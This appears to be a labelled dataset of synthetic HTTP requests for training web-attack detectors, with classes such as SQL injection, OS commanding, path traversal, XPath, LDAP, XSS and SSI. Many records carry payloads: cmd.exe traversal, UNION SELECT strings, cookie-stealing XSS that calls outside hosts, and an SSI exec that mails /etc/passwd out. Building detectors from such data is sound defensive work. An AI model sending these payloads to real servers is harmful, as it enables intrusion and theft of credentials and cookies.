Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47791
Start - Id: 39221
class: SSI
GET /6bgaiwleeoifqmhu/wvbIrTu9S_WEQBrrBPBr.mdb?wede9o03=replace&ctEag6xbebow=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&cn=980&esslbsegwceayU=3501&edra7nuLeoen=hs-cv&oidann=2299636588 HTTP/1.1
Host: 152.201.154.63
Connection: close
Accept: application/postscript;q=0.7
Accept-Charset: euc-tw;q=0.5, us-ascii, x-mac-roman;q=0.5, windows-1250;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: oaoy=pnsmxsrt
Client-ip: 139.182.4.92
Cookie: ndabe=salris7y9odt8t;KYgSh-_=o iibpa;solgvoeehr=557698363;4.uBZCPE=:autoexeclsx8a[<t;@3Hl=ea%tetcbnyl3 e) 
Cookie2: $Version="748"
Date: Wed, 07 Apr 10 10:15:07 CET
ETag: "stS0mrsBNpQBIdeOv"
Expect: 100-continue
From: eobt@sitnTmdv.ch
If-Modified-Since: Fri, 27 Oct 06 04:44:51 GMT
If-Unmodified-Since: Thu, 14 Feb 08 09:27:58 CET
If-Match: "Bp_k@5tU4FWSHcmVId"
If-None-Match: "s0NKnvzCbUPI4@SZlRMG"
If-Range: Sat, 19 May 07 21:16:14 CET
Max-Forwards: 322
MIME-Version: 2.2
Pragma: no-cache
Authorization: tvfih toaier=t6einmm
Range: 5962-
Referer: /fa73rtg.php3
TE: trailers,trailers
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 7.5; oG-jm; rv:2.7.9) Gecko/11913802
UA-Disp: 4572,5584,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 506x400
Via: 6.7 www.1h4ee.html, HTTP/5.3 www.vecA.jpg:0032, 4.3 www.easnjce.htm:63
Transfer-Encoding: compress
Upgrade: etvee/9.3, tcp7s/3.5, trta/7.7, hrfcrn/6.4
Warning: 602 16.121.95.118 "ebofannntotprhe" "Sun, 22 Jul 07 23:06:49 CET"
X-Forwarded-For: 49.185.214.60
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39221
Start - Id: 44400
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 95.63.201.216
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.7, iso-8859-7;q=0.9, windows-1254;q=0.6, macintosh;q=0.9, euc-jp;q=0.9
Accept-Encoding: gzip, gzip, compress;q=0.1, gzip, compress;q=0.3
Accept-Language: tlt-hlezs;q=0.8
Cache-Control: ai=ahc5
Client-ip: 145.27.27.144
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="556"
Date: Sat, 10 Mar 07 24:48:32 UTC
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sat, 15 May 04 08:04:34 UTC
If-Unmodified-Since: Wed, 22 Aug 07 21:13:07 CET
If-Match: "S380h@AwL-rl1Y_x4"
If-None-Match: *
If-Range: "-vNmnqdmEAFkbxqkELej"
Max-Forwards: 7241
MIME-Version: 6.5
Pragma: eEl=bs
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: NTLM aTNocnRjZ2hwaTVlaW5oOEVyNGVhZHI1aWVhYW9lZG9lMXRjU3BpYW9lYXNhaA==
Range: 6-459,-64787
Referer: http://www.adce4.com/enRaNmdp/p3jenoit/rpectrd/srean/tYu1o.jpeg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.7 (compatible; Konqueror/9.3; WinNT; tmnolryo)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 8.9 www.cslitr.js:32
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 354 118.238.114.197 "eyha0hehiihomqhzgiu0" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44400
Start - Id: 42121
class: SqlInjection
GET /B5l/nq1/sZyjbLL/cuv7wY@wACy/omAsltbXe/e6afusyyfe/sLENujf.asmx?slonr=%27+%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F46%2F**%2FFROM%2F**%2Fcirgiwxui%2F**%2FWHERE%2F**%2F%28+++%27%27++++%3D+%27++++%2F**%2F&dnq=iio&Qcrtinftmu=idQ0b&on=eaps%40dwohlincludenporeeet+&tYconnect0M=3362675 HTTP/1.1
Host: 79.131.174.81
Connection: stywoI
Accept: */*;q=0.4
Accept-Charset: iso-8859-9, us-ascii, iso-8859-3, koi8;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: 93-Id, seSmi-t, ttcnlo-Ale
Cache-Control: no-transform
Client-ip: 209.54.39.204
Cookie: tnrt4yDh=2322283835;YmQ77netcathtpass=lNtetiadmql;mA4frqinelLtb=87;7tphod7yuc=iZTH9j7V;efaesfd=nm&tncopen4emwtl]aechoe?i
Cookie2: $Version="52"
Date: Fri, 06 Jan 06 14:15:35 UTC
ETag: "36ABV77V@jd_sdUj"
Expect: aeUss=7wjdte;uElxnLe
From: stgPOeE@DeaasWp.org
If-Modified-Since: Wed, 26 Mar 08 20:31:22 UTC
If-Unmodified-Since: Wed, 28 Jul 04 08:29:55 CET
If-Match: *
If-None-Match: "1CYOhi3upGPrFe2R81bB"
If-Range: Sun, 14 Jun 09 17:42:16 UTC
Max-Forwards: 513
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="bet8ru"
Range: 80-3804,023297-91,09-
Referer: http://tnsioh.net/dsFhe/scca0aos/i1eh.exe
TE: trailers
Trailer: Proxy-Authorization
User-Agent: rT5r3qGg http://www.oeklncya.ch
UA-CPU: MIPS
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 051x7587
Via: HTTP/8.7 www.Wo40.css, 5.7 www.crh7es.css, 6.6 145.98.244.176
Transfer-Encoding: compress
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42121
Start - Id: 36199
class: PathTransversal
PUT /rT028pwbtBcLDMD/9jxrolmct/ae0osONoahe/tnBo/sm0V/eT2RX_NEx/3@.tiff? HTTP/1.0
Content-Length: 98
Content-Language: tapumyl,sqc,Oqu1a
Content-Encoding: compress
Content-Location: http://www.haaos6.net/ntvehi/tapah.fgf
Content-MD5: cGZtbkhlYmcxbmZzbmtlOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Aug 08 04:31:13 UTC
Last-Modified: Thu, 09 Apr 09 18:22:53 UTC
Host: 233.103.18.96
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.1, iso-8859-15, utf-7;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 241.34.128.84
Cookie: mtqowvtluanoz=h;pbVpro=el]hEmn-evuhny;PVIqXxWlEbgsound2d=..\..\..\..\..\..\WINDOWS\system.ini
Date: Mon, 09 Aug 04 05:33:05 GMT
Expect: rqhE0=aqnjtmp;tenrlaTr
From: ontmsc@ipBcOak9.biz
If-Modified-Since: Sun, 16 Nov 08 23:11:46 GMT
If-Unmodified-Since: Tue, 05 Feb 08 02:53:19 UTC
If-Match: *
If-Range: *
Max-Forwards: 6183
Pragma: 5tCniide='Si5'
Authorization: NTLM aW90ZVRkNGFlaXJ3b2IwckR0bmxzOXRhdXE5b3F3cmVieQ==
Referer: /sreeeiu.php3
TE: chunked;q=0.5
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 9.9; er-oe; rv:7.2.3) Gecko/46775370
UA-Color: color32
Upgrade: vssmB/1.3
----: ------------------------------------

uaojloptWh=l mWsrytI nult&spa4yHka1=3538606&PCRAThtacces=odt5isEftf&DNxOeEk4xYewinnt=nnyo3tNf5imqt

End - Id: 36199
Start - Id: 43390
class: OsCommanding
GET /clysmt/cEgAu81/rkzE.gif?ssp3=%5Cnuftp+++-p++++www.tate.com+++++%2Flame%2Ficns%2Fndries%2Far%2Fleve%2Fes&ctirn=02&k5ad70fdtldknd=1e+lysiteaNio&J61Egroup bytSv=4278034966&8oehow4azGmce=%24nhome&xenN=h%24n HTTP/1.0
Host: 25.9.19.19
Connection: close
Accept: audio/x-wav
Accept-Charset: koi8-r;q=0.3, x-mac-arabic;q=0.5, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: *
Cache-Control: tCate='hiy'
Client-ip: 143.76.65.70
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="5"
Date: Mon, 22 Sep 08 10:38:20 UTC
ETag: W/"AMQ50BgW5OZswZc"
Expect: 100-continue
From: no4b@rasantepan.ch
If-Modified-Since: Thu, 18 Dec 08 11:50:24 UTC
If-Unmodified-Since: Tue, 02 Jun 09 24:55:58 GMT
If-Match: "v8gUMR38inclouEVOl"
If-None-Match: *
If-Range: Tue, 13 Jan 04 20:37:40 UTC
Max-Forwards: 050
MIME-Version: 1.8
Pragma: lv0e='6dil'
Proxy-Authorization: Digest realm
Authorization: Basic dGJ2ZXJuajp0c3RvbTVj
Range: 640570-,-8
Referer: /ndtrOim.sh
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.0 (compatible; Konqueror/6.4; Win98; rnd9ht; re0auas; ngmzntxrdd)
UA-CPU: StrongARM
UA-Disp: 400,542,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 5.9 161.28.182.43
Transfer-Encoding: identity
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43390
Start - Id: 36583
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.inpsnil.de
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: big5;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 252.39.154.149
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="3"
Date: Fri, 13 Apr 07 18:06:27 CET
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: osNAoh@aHn2nry.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Fri, 19 Mar 10 09:16:26 CET
If-Match: *
If-None-Match: *
If-Range: "YkdFyFmR4vc.Sz8ebw"
Max-Forwards: 2249
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM QWlyQnJpcGRlYWlSYWFla254emFpZzFkaGRjcXN0ZG9odXRsZXlocm5BZQ==
Range: 603-731460,2527-,65-
Referer: /n7kost.bin
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Ans3sr (cwl-Yau; kx0Bqnze; n7vRON.9)
UA-CPU: PowerPC
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 9.3 www.pghfza.png
Transfer-Encoding: identity
Upgrade: losg/9.6, e4N/7.5
Warning: 353 98.201.134.39 "fe2bemhte" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 8032084316017934872
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36583
Start - Id: 48391
class: XPathInjection
GET /ssdeeoepemfuNd/hHj5/wpVinetjiooteone41ol/cW.shtml?Ear0tnrtAem=77062&1dhQawinntnmSB1w=y+rCttredehh%279&Ede2adeis=uV2SVda&tpcpleroyeipo=am&Ar79xetre=7366&-VdropKF@LT=%2Fret%3Erp0xt%25pEe%3Ejtj%28&0U7dI=aoonr%2B+h7o7S&tzlpsyc=bBtm&Eoedm=32r&1enq=59&wiehtetnsogg=88&pysehii7n=nuInLnc1yf&hAteleo=oih8efinq HTTP/1.1
Host: 16.96.21.85:80
Connection: kehtC
Accept: audio/x-wav;q=0.3, application/*;q=0.3, image/png;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 71.56.85.176
Cookie: el=w/vop/t/child::node()[position()=8]   or     'onhrtvup'=   '
Cookie2: $Version="592"
Date: Mon, 22 Dec 08 05:36:27 GMT
ETag: "fKilNh51H8NrPov"
Expect: zlhba
From: Teatbno@eEzogffs.fr
If-Modified-Since: Fri, 20 Mar 09 10:01:09 GMT
If-Unmodified-Since: Mon, 25 Sep 06 01:24:16 GMT
If-Match: *
If-None-Match: *
If-Range: "T9nlCoHesKkBXDU"
Max-Forwards: 102
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic YWttY29hajp0b2Zh
Authorization: Digest opaque="Zaln0yrh"
Range: 6-4347,22520-
Referer: /i2knnq.mdb
TE: deflate;q=0.9,gzip;q=0.3,deflate;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/4.0 (X11; U; Linux i586 4.6; sh-et; rv:6.4.8) Gecko/55512674
UA-CPU: Sparc
UA-Disp: 574,086,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 128x9065
Via: FTP/8.8 www.arrt.htm:5, o53/9.1 84.143.77.184, HTTP/2.9 www.rloadfn.css:3
Transfer-Encoding: identity
Upgrade: drca/7.4, zeot/7.9, sjnA/1.3, wIv/9.0
Warning: 216 186.83.235.10:55267 "2nxkEalywutount" 
X-Serial-Number: 631643747373
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48391
Start - Id: 37487
class: LdapInjection
GET /aa0ehcrdte94ho3.js?aclinaanl=emtenEniframes+nnxterma&onfiodmOa=ot%3Dl&ithrto=lgesrw5om&.SAqakHu=c%7CteiA%26ht HTTP/1.0
Host: 242.45.214.125:1950
Connection: close
Accept: application/*;q=0.5, audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 71.248.232.101
Cookie: _6gwdivvarmreplaceYJ8j=t4)(    |   (1aRp=*)
Cookie2: $Version="017"
Date: Sat, 28 Mar 09 14:04:07 UTC
ETag: "U.WYXEjP6IvruVqLzm@"
If-Modified-Since: Fri, 21 Sep 07 04:13:25 UTC
If-Match: *
If-Range: Fri, 06 Aug 04 01:44:04 GMT
Max-Forwards: 6711
MIME-Version: 0.8
Pragma: Rne=ie
Authorization: Basic YXNzbzprbmV2Z3pFaQ==
Range: -15680,16-,44-
Referer: http://2adaavW.fr/eoerchrp/54ierh4o/xanacoum.pdf
TE: chunked
User-Agent: reddac/6.8.0.4.0
Via: HTTP/2.1 10.53.47.136
X-Serial-Number: 461497285653885404

null

End - Id: 37487
Start - Id: 42064
class: SqlInjection
GET /tb/0QEereyee8e/u0WmVG_Sa7oPY.2pq/ioninnusote/ec.q-NTHq19cruhK73p/1IUXN9nlB12FRjr-/hW-7fQU/h@fzbJqA.6/ylgme7etliiirubia/ta9lwrjegTniuaqd.mspx?bgsound-J9ZIs=iIj+s&ieiodivnhfcw=j%5Cr&hTei1d=njre%3Dut&8KI83t1Mwgetobject=nevalnt6dmSei%27whr+D&hk3vua=c&0k3Dv6xCorbMV=%27UNIONALLSELECTfieldFROMresiitWHERE%27%27%3D++%27&yhcise=468480&ujgcsog=1425&aEheN9osquo=%3EicAfo+echotelnetihs%28&rbp=7912179542&t2TefoartAo=etEydm9oeoe1h&ahjke9waEpfbzsh=6875269561&AsEm9e1=iyn%3Enl&o_lYinclude-ehttpW=%7Cem7g HTTP/1.0
Host: www.JtwRnesbn.net:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-roman
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 147.90.51.52
Cookie: lrt0NSarsahreO=o0ddD)eAi3e;6eaLbdetti3=7322632;gl=000033411
Cookie2: $Version="58"
Date: Sat, 13 Sep 08 19:15:51 UTC
ETag: "clihp9GQoUX8rElpcr"
Expect: dntttuy
From: rnlon@elnNaanan.fr
If-Modified-Since: Thu, 31 Jul 08 15:42:21 GMT
If-Unmodified-Since: Wed, 28 Apr 10 03:54:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 18 May 09 18:10:29 UTC
Max-Forwards: 32
MIME-Version: 0.9
Pragma: b='obv'
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: traqii ecobe=djE3usta
Range: -99729
Referer: http://cmgtsu8D.fr/uXcuiiz/7aRb.php
TE: trailers,deflate;q=0.3
Trailer: Range
User-Agent: Mozilla/5.8 (Windows; U; Win 9x 3.8; cd-qr; rv:3.8.0) Gecko/88037979
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9544x100
Via: 2.0 56.118.144.33
Transfer-Encoding: compress
Upgrade: rRlEh/1.9
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42064
Start - Id: 45262
class: PathTransversal
GET /./? HTTP/1.0
Host: www.rgonoeoel.uk
Connection: close
Accept: text/xml;q=0.9, application/*;q=0.5
Accept-Charset: windows-1251, cp-936;q=0.6, euc-kr
Accept-Encoding: *
Accept-Language: soh1co-oGsdmol, i-Ae
Cache-Control: only-if-cached
Client-ip: 199.17.219.192
Cookie: FnfdyedHaoen=aBY5;0oEttrhlmae=3o~;eube5stmaae=74
Cookie2: $Version="36"
Date: Sun, 16 Mar 08 24:29:14 GMT
ETag: W/"ba2N-LW3dBH.hNtm3T"
Expect: sdseNet=shmf
From: geleR@t0uaaRegG.gov
If-Modified-Since: Sat, 26 Jun 04 08:33:37 UTC
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: *
If-None-Match: "rFUl3z-8CxDUOXS"
If-Range: Sun, 08 May 05 20:41:13 UTC
Max-Forwards: 39
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest qop=evai40
Authorization: heeno IeuEns=iPrerssw
Range: -249,23568-43
Referer: /nhts/shtvtt/Rtddehgt/hiec7cul/ttses.jsp
TE: chunked
Trailer: Host
User-Agent: Nayo3h/6.1
UA-CPU: 68000
UA-Disp: 783,7858,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: deflate
Upgrade: t7aRna/4.0
Warning: 924 www.Tmlirlsa.shtml "t5eakntztrsthoinaeue" 
X-Forwarded-For: 118.3.52.80
X-Serial-Number: 67855229
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45262
Start - Id: 39033
class: LdapInjection
POST /h7-rPH/bMY7H@iB.jcCXoyGHI/m26rbasldewYwvOo/ep8irb/wV.php? HTTP/1.1
Content-Length: 15
Content-Language: rhikdDat,h3,reix
Content-Encoding: identity
Content-Location: /hodhohn/NO4mtb/nxnsC/NU1fd/yN7mipsr.dll
Content-MD5: dEJsckNwNmFlaGVzbDdzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jun 07 24:01:58 GMT
Last-Modified: Fri, 17 Oct 08 14:56:40 GMT
Host: 27.207.50.106:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.3
Accept-Language: eLlArne-lroorti;q=0.7, autbOeso-n;q=0.2, 4aY0ot-oeg8iea;q=0.8, 4tuexH1-lue8taee
Cache-Control: min-fresh=08
Client-ip: 73.239.50.202
Cookie: WDcopyfD-=xM9W_LgrH
Cookie2: $Version="31"
Date: Sat, 05 Jan 08 21:09:16 CET
ETag: "m.zvaF9l0uX5MvZcQ"
Expect: 100-continue
From: 6eGtzO@aUa6ae0S.fr
If-Modified-Since: Wed, 15 Jul 09 06:17:50 CET
If-Unmodified-Since: Sat, 23 May 09 10:59:02 UTC
If-Match: *
If-None-Match: "OmKziVlugxBkMcPanV"
If-Range: Tue, 18 Apr 06 12:43:13 GMT
Max-Forwards: 65
MIME-Version: 9.1
Pragma: oy9af='rpnA'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic YWVvZTpzc1RvM0l0
Range: -0298
Referer: /wrarlhLh/gIod0C/tsacet/oae9/ekhe.asp
TE: trailers,gzip;q=0.4
Trailer: Authorization
User-Agent: )    (   | (e9e=enlja*)
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x217
Via: 5Uee/7.0 www.eTrnot.gif, HTTP/7.8 www.ufldWm2.tiff
Transfer-Encoding: deflate
Upgrade: ne66ft/5.8, ziI/5.3, ofii/1.2
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esry=aWEmBJZw4.

End - Id: 39033
Start - Id: 47011
class: XSS
GET /vtccshe5lmydioh/awneEoAsro6ahonimOti/QlinkYg_YUj/hstyleEYy./tlsa.G2LdCZWnbwinnt.htm?d7e=neoTet&cRvdoqq=Ne&ptQ0ED=%3Ca+href%3D%22++++javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ittaesli.com%2Fcgi-bin%2Fretaat.cgi%27%2Bdocument.cookie%29%3B%5D+%22++%3E HTTP/1.1
Host: www.oet1c4.org
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ebem-and, cehd-dtat4, saOyNkoU-Et, xlehi-cot;q=0.3
Cache-Control: max-age=487
Client-ip: 18.81.58.217
Cookie: etbgot=wp-;vvjH4=ovlknciymd
Cookie2: $Version="07"
Date: Fri, 03 Oct 08 01:36:56 CET
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: siiia@cge3.it
If-Modified-Since: Sat, 08 Aug 09 10:50:52 GMT
If-Unmodified-Since: Fri, 25 Feb 05 24:12:07 UTC
If-Match: *
If-None-Match: "HrSlZAl90YhF.kM2@"
If-Range: Mon, 02 Jun 08 11:23:20 CET
Max-Forwards: 403
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Digest username="unbxdine"
Range: 5-22964
Referer: http://ardoe.uk/D7EeC/47wi.dll
TE: gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: sKk-yydH6l http://www.mset2.st
UA-CPU: Sparc
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: Ais/6.2 55.196.188.47, 2.1 88.186.140.32
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 754 www.mve9l.gif "2v5wC34esds" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 159927284892004319
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47011
Start - Id: 37116
class: LdapInjection
GET /eitityaa1xsudSen/ec3GGHDyN5Jo.html?o2foknprsnwa76=whdth&dodeniRe=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: 50.140.223.71
Connection: keep-alive
Accept: application/*, text/html, audio/x-wav
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 116.227.6.28
Cookie: Ya8ilnt9izeveta=ex-deT1;heT=2709;oiio8soeianEnw=oa&8ao
Cookie2: $Version="029"
Date: Sat, 13 Mar 10 18:17:35 UTC
ETag: W/"1hm2z.hSMJ2UX6BV@"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Fri, 23 Oct 09 07:35:45 CET
If-Unmodified-Since: Mon, 07 Mar 05 04:54:58 UTC
If-Match: "ERNyZeAE62yHcTnzMakT"
If-None-Match: "YaYrghb5gmtE5xvyi@P"
If-Range: Thu, 28 Sep 06 23:48:05 CET
Max-Forwards: 0617
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest cnonce="cvdipt"
Range: -12929,-403
Referer: /cces/2eso.mp3
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 0.1; Za-r4; rv:4.3.6) Gecko/13033455
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: 0.1 231.16.188.166
Transfer-Encoding: compress
Upgrade: EenZu/2.8, Cisyi/4.3, airy/3.6, 5jWhoZ/5.7
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 4738976742686812
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37116
Start - Id: 46751
class: XSS
GET /pIzyrs50V1tEQ681Cb3/eRfHbgXHmFQoqSk7/24Vupdate/dtgwYK/sh7Q2XtIvWcOE5rt/eSZwA3Al6/dZEVl9BcV/aoXiSbXx_Bv65X21wn-/lletmsmcsEhhttqrh7.html?IZGvar24catT=tjmail&ci2ofb=5274637&arp=%26%2Be&7cicvyoneiaoE=t.f.XkRNoBed&rSece=neiyea3l6wrseEe&L7s=0sh7sEnsaeqtn&wp-BeqpLz9Ds5htpass=4927192274 HTTP/1.0
Host: 182.14.115.95
Connection: tkqida
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: wo-Cdawgas, xhTzz-8wnSrmo, Da11i-tga;q=0.6
Cache-Control: only-if-cached
Cookie: zo.1AY4=documentjOxhbtdropA80links?h4Qitt;admingy1N9X=7;Vfpositiony9eL6=aecho;2xall_ZoSfrmetaz=u;isCuN9=69072681;PHuJ6Om0vJ-=<![CDATA[<!--]]  ><script    >[window.open('http://166.241.194.72/ve.php'+document.cookie);]//--></script   >
Cookie2: $Version="126"
From: aw9Me@wtge4nm2.gov
If-Modified-Since: Mon, 21 Jun 04 23:32:21 UTC
Max-Forwards: 2
Referer: /spaEe3/ltinscv.asp
User-Agent: aeAaUrqeu (cRtiFRXm; e@I-sDa; dbCy2e0O.S; rvEg@L8Jce; dOJgKHZ5D)
Via: 9.9 170.42.9.235, FTP/7.6 196.48.119.250:72
Transfer-Encoding: gzip

null

End - Id: 46751
Start - Id: 40064
class: SSI
GET /ht.K@3d/sosmatilnefq/QFa2Hc-F36/aanl66hho4ns/u7kfBEY64q/T89.B130xjY/dlytegDoeas94/ksXEpaaneerw/cK.snUmDG/eeOrd5eit/an.tiff?Co=otutcopye%28thrs%29dgnlv%7E&41Fj9D3PCZV=56051181&tthtRtramw=iF6&nua=ftc&bt=49&OnNShWP=ohEsqdrL0W&Erennddhh8ghs=496647&dsEo8EE=6442753&5cI2aPvopfaeee=ilrcdetiny0eao3us&eee9fxho7=%3C%21--++%23exec+cmd%3D%22%2Fbin%2Fmail++++dhd8w.com+++++%3C+++%2Fetc%2Fpasswd%22--%3E&uapludhi24c=0dseenbrohhtaccesiei0h&eRelB1IHinsert=afXyCF.LVj HTTP/1.0
Host: www.3itbynDnjb.fr
Connection: keep-alive
Accept: image/jpeg;q=0.7, text/*;q=0.4, application/*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: da-tacofo;q=0.2
Cache-Control: max-stale=37795
Client-ip: 146.42.189.46
Cookie: 2mwcmOKnKEHe=pelogmhs
Cookie2: $Version="35"
Date: Tue, 15 Apr 08 01:06:36 UTC
ETag: W/"Drd1tNkkg2Zi0rWU"
Expect: ox4t=ecsoWvu
From: atth5@DlahcYr4ai.cz
If-Modified-Since: Thu, 05 May 05 13:11:30 GMT
If-Unmodified-Since: Mon, 07 Jul 08 13:22:33 CET
If-Match: "6SYJR@aigN4VNzLT8"
If-None-Match: *
If-Range: "T-vmJJkQA.ib@jMqAMb"
Max-Forwards: 0
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic NnRpYWQ6cmU3cnRxMQ==
